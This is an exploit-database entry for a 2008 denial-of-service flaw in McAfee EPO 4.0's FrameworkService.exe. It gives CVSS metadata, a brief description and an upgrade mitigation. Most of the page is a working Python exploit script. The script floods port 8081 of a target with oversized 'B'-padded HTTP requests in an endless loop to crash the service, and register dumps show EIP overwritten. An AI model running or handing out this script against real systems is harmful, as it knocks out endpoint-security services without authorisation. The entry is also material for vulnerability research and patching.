header-logo
Suggest Exploit
vendor:
EPO Framework Service
by:
Mati Aharoni
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: EPO Framework Service
Affected Version From: 4
Affected Version To: 4
Patch Exists: Yes
Related CWE: N/A
CPE: a:mcafee:epo_framework_service
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2008

Mcafee EPO 4.0 (and others) FrameworkService.exe DOS

A denial of service vulnerability exists in McAfee EPO 4.0 (and others) FrameworkService.exe. An attacker can send a specially crafted HTTP request with a large number of 'B' characters followed by a valid HTTP request to trigger this vulnerability. This will cause the service to crash, resulting in a denial of service condition.

Mitigation:

Upgrade to the latest version of McAfee EPO 4.0 (and others) FrameworkService.exe
Source

Exploit-DB raw data:

#!/usr/bin/python
# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS
# More than meets the eye
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/mcafee_again.py.txt


# EAX 00840C30
# ECX 00837830
# EDX 01EACF18
# EBX 00004000
# ESP 01EAFF04
# EBP 01EAFF38
# ESI 00837830
# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA
# EIP 42424242

import socket
import os
import sys
from time import sleep

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()

expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()

while 1:

	expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
	expl.connect ( ( sys.argv[1], 8081 ) )
	buff="B"*243
	req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n'
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	expl.send (req)
	data=expl.recv(1024)
	print data
	expl.close()

	sleep(0.1)

# milw0rm.com [2008-04-02]